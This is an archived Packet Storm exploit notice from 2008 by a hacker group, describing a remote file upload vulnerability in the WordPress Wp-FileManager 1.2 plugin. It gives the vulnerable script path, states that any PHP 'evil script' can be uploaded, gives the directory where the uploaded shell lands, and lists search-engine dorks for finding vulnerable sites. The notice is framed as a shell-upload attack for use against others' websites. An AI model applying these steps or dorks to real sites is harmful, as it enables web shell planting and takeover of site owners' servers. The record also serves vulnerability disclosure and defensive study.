wpfile-upload.txt

2008-01-07T00:00:00
ID PACKETSTORM:62341
Type packetstorm
Reporter H-T Team
Modified 2008-01-07T00:00:00

Description

                                        
                                            `######################################################################################  
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350} #  
# HOME : http://no-hack.net #  
# Script : Wordpress Plugin Wp-FileManager #  
# Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip #   
# BUG : Remote File Upload Vulnerability [ Shell Upload Exploit ] #  
######################################################################################  
  
(~)| 3xpl0it4t10n :  
  
This file allowed you to upload directly a PHP script or anything you want it  
  
You have just to enter into :  
  
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php  
  
After uploading you evil script you will find it in this directory :  
  
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)  
  
  
HeRe we are some dorks :  
  
plugins/wp-filemanager/   
inurl:/wp-filemanager/  
  
  
  
  
# greezt : GoLd_M , RoMaNcYxHaCkEr , DDos , and all muslims Hackers   
  
  
  
######################################################################################  
# H-T TeaM {HouSSaMix _ ToXiC350} #  
######################################################################################  
`